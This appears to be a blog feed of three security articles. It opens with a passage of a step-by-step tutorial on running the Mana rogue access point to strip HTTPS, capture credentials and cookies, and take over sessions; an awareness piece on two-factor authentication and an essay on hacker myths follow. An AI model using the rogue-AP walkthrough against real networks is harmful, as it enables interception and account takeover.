It listens for computers and mobile devices to beacon for preferred Wi-Fi networks, and then it can impersonate that device.

Once someone connects to the rogue device, it automatically runs SSLstrip to downgrade secure communications to regular HTTP requests, can bypass/redirect HSTS, allows you to perform MitM attacks, cracks Wi-Fi passwords, grabs cookies and lets you impersonate sessions with Firelamb.

But that is not all; it can also impersonate a captive portal and simulate internet access in places where there is no access.

Mana is very effective and, well, pretty scary!

Before we get started, for best success use Kali Linux v.1.08.

And as always, this article is for educational purposes only, never try to intercept someone else’s wireless communications. Doing so is illegal in most places and you could end up in jail.

Mana Tutorial

1. Download and unzip Mana from
2. Run the install

Mana will then install libraries and other dependencies to work properly.

Once completed the install places the Mana program in the /usr/share/mana-toolkit directory, config files in /etc/mana-toolkit, and log files and captured creds in /var/lib/mana-toolkit.

3. Open the main config file /etc/mana-toolkit/hostapd-karma.conf

Here you can set several of the options, including the default router SSID, which by default is “Internet”. Something like “Public Wi-Fi” may be more interesting. The other main setting here is “karma_loud”, which sets whether Mana impersonates all APs that it detects or not.

Lastly, all we need to do is run one of Mana’s program scripts located in /usr/share/mana-toolkit/run-mana. The scripts are:


Mana Scripts

For this tutorial let’s just run Mana’s main “full” attack script.

4. Attach your USB Wi-Fi card (TL-WN722N works great).
5. Type “iwconfig” to be sure Kali sees it.


6. Type “./” to start Mana.

Mana then starts the evil AP, SSLstrip and all the other needed tools and begins listening for traffic:

Mana running

Once someone connects, Mana will display and store any creds and cookies detected as the victim surfs the web.

7. When done, press “Enter” to stop Mana.

To check what you have captured run to view captured cookie sessions:

Mana firelamb

This asks which session you want to try from the captured cookie sessions. It then tries to open the session in Firefox. If the user is still logged in you could take over their session.

You can also review the log files manually in /var/lib/mana-toolkit.

Mana works equally well against laptops and mobile devices. And the inherent trust of “preferred Wi-Fi networks” that most systems use makes this tool very effective at intercepting and impersonating wireless routers.

To defend against this type of attack, turn off your Wi-Fi when not in use. Be very careful about using free or public Wi-Fi networks. Also, it would be best to perform any secure transactions over a wired LAN instead of Wi-Fi!

If you enjoyed this tutorial and want to learn more about computer security testing, check out my book, “Basic Security Testing with Kali Linux”.

This was cross-posted from the Cyber Arms blog.

Why Two-Factor Authentication is Too Important to Ignore
Tue, 21 Oct 2014 11:46:56 -0500

In August, it happened again: a headline-grabbing warning that 1.2 billion passwords had been stolen by a Russian cyber gang, dubbed CyberVor, caused quite a stir. While questions were raised about the legitimacy of the CyberVor report and the scant details surrounding it, in the past these types of events did not even make it into specialized magazines and news services, much less major news outlets. And if they did, superlatives were required to capture anyone’s attention. However, just because password theft may not always garner a big news report, it doesn’t mean it isn’t happening all the time.

On the contrary, and especially during the past year, quite a few companies have admitted to being victimized by data breaches and losing control of large amounts of data. Big retail chains Home Depot and Target experienced security breaches that culled information from more than 100 million cards combined, while 233 million eBay users were put at risk of identity theft after an online security breach. 

Going forward, we have to be prepared for the possibility that private information provided to a third party, like a merchant or a public agency, will be stolen. What does this mean for the security of user passwords? “Set it and forget about it” password security simply does not exist anymore. Passwords today can only be regarded as a temporary security measure that should be limited in both time of use and number of accounts.

Nevertheless, experience shows that users recycle the same password for many or all of their accounts. For many, it’s just not feasible to memorize dozens of unique passwords that are sufficiently strong.

Users can avoid this problem and improve their data security by implementing a secure password safe, such as 1Password or KeePass, on their end devices and by using a really strong password to secure it. The safe contains the passwords of all accounts and automatically applies them during the login procedure.

Two-factor authentication is equally safe. In addition to a password, the user is required to have a second component for verification. With this method, the user has to combine knowledge (password) and ownership (mobile phone, token).

Two-factor authentication has long been a standard for safety-critical applications. For example, it has been possible for years to secure VPN remote access using a second authentication factor. In the past, the “something you have” component of two-factor authentication consisted of a small token displaying a number necessary for login. The user had to enter this one-time password (OTP) in addition to the password. Now, other solutions are available that do not require the use of tokens. Select VPN solutions with Secure Enterprise Management (SEM) capabilities, for example, allow for use of OTP with mobile phones or smartphones.

With the exception of online banking providers, websites have rarely offered two-factor authentication. However, due to the increasing frequency of data theft, more sites are offering it. For example, Microsoft (OneDrive,, etc.) and Facebook now offer two-factor authentication, and Dropbox can also be secured with a second login factor. This added layer of security helps reduce the risk of data theft even if a user could not resist picking his pet’s name for a password, or if he decided to pick the most popular password worldwide: “123456.”

This was cross-posted from the VPN HAUS blog.

Hacker Myths Debunked
Mon, 20 Oct 2014 12:12:23 -0500

By: David Bisson

We’ve been hearing a lot about hackers recently, mostly in connection to serious data breaches. We think of hackers compromising the nude photographs of popular female celebrities, including Jennifer Lawrence and Kate Upton. We think of them stealing 56 million Home Depot customers’ credit card information. Or using Backoff malware to infiltrate Kmart or Dairy Queen.

All of these incidents teach us to think of hackers as nefarious individuals. They will stop at nothing to degrade our privacy, steal our identities, and ruin our experiences in cyberspace. Their craft is dishonorable, and so they deserve to be hated—and feared.

But is this stereotypical? Are all hackers like this?

In honor of National Cyber Security Awareness Month, which aims to improve user awareness about cyber threats online, below we problematize some of the most common hacker stereotypes we’ve come to learn and love. We do this in an effort to appreciate hacking for the complicated, variable and highly individualized practice that it is.

   Myth #1: Hackers Are Maladjusted Young People Who Live In Their Mothers’ Basements

We all know this one quite well. Some of the most dangerous hackers—the myth goes—wear black T-shirts, have long hair and are under 30 years of age. They spend all of their time on the computer – a passion which they use to isolate themselves from the rest of society. They are weird and maladjusted, which helps to explain why they want to do what they do.

Sure, there might be hackers that fit this stereotype but countless others do not. Take the idea that hackers spend endless hours at the computer—this is a common misperception of computer scientists that, despite its wide appeal, doesn’t hold any water. In fact, many hackers have balanced relationships with their computers while others even have “day jobs” and just hack on the side.

Hackers can have healthy relationships with their peers and families and have proven records of academic excellence in school. Some may be young, but others are not, having spent decades accumulating their technical expertise. Many are well-adjusted to society, which in one light could make some hackers more dangerous.

John Walker, CTO of the Cytelligence Cyber Forensics OSINT Platform and a Blogger for Tripwire, explains: “There are [some] in our midst equally dangerous and very well accomplished over a number of years in which they have learned their trade, honed their skills, and could just be that guy sitting next to you in your office – so think again, don’t make too many preconceived judgements, and remember to consider the ‘Unusual Suspect Factor.’”

Myth #2: Hacking Is A “Boys Only” Club

Hacking may be a predominantly male activity but that doesn’t mean that there aren’t female hackers out there. For instance, a loose 22-year-old group of women known as Haecksen, a hacker club that uses for its name the German word for “witch,” helped organize the Chaos Computer Club (CCC) Congress in 2010.

Other female hackers have spoken at DefCon or write viruses that destroy information instead of stealing it. We might hear the most about male hackers, but women are just as active in hacking communities.

Myth #3: All Hackers Are Masters of Their Craft

The way we paint hackers today elevates them to a level of unmatched technical prowess. Using this platform of expertise, they compromise any system they want with ease, regardless of whatever security protocols may be in place. Subsequently, as information security professionals, we are forced to play defense against these computer masters.

Mark Stanislav, Security Project Manager at Duo Security, explains this is not always the case: “Manipulation of systems is often as predictable as watching the sunrise from the east every morning. After enough practice and/or education, a hacker of a specific context can likely say, ‘Oh, I’d totally try to do XYZ to hack that’ given a scenario.”

Additionally, not all hackers are necessarily skilled computer programmers. Sometimes all hackers need to know is where to look with respect to a particular system configuration or maybe they let a tool do that for them, despite having minimal understanding of how the tool works. Ultimately, we all know that it doesn’t take a computer expert to break into a network.

Myth #4: All Hacking Is Bad

The notion that all hackers intend to cause harm is one of the biggest hacking myths today. Lamar Bailey, Director of Security R&D at Tripwire, says:

“Hacking systems to gain access to data or features that are denied to the current user is the most popular definition that most people think of when it comes to hackers, but it goes much deeper. Hacking hardware to add new features has become a very popular way to extend the life and increase the security of all devices in our homes.”

Ultimately, hacking has less to do with compromising data than with developing creative solutions to technical problems. Ken Westin of Tripwire rightly notes this fact: “Hacking is about understanding the underlying nature of technology—knowing specifically how things work from a high level all the way down to its most granular components. When you fully understand how things work, there is power in being able to manipulate it, shape it and utilize it in ways it may not have been intended to.”

In this sense, hacking, like many other things, comes down to intentions. Ethical hacking can improve the security of various products, whereas malicious hacking seeks to undermine data integrity. It’s how people hack that shapes the nature of a particular incident.

Hacking In All Its Colors

We hear a lot about hackers these days, but mainly those who are after people’s personal and financial information. The majority of hackers out there aren’t social miscreants who are technical masters bent on shutting down the Internet. They may be less knowledgeable, or they may be in the hacking business for the sake of computer security. The sooner we realize hacking’s variability, the sooner we can champion the whitehats who are helping to protect us, and the sooner we can broaden our focus to target those who threaten our security online.

This was cross-posted from Tripwire's The State of Security blog.
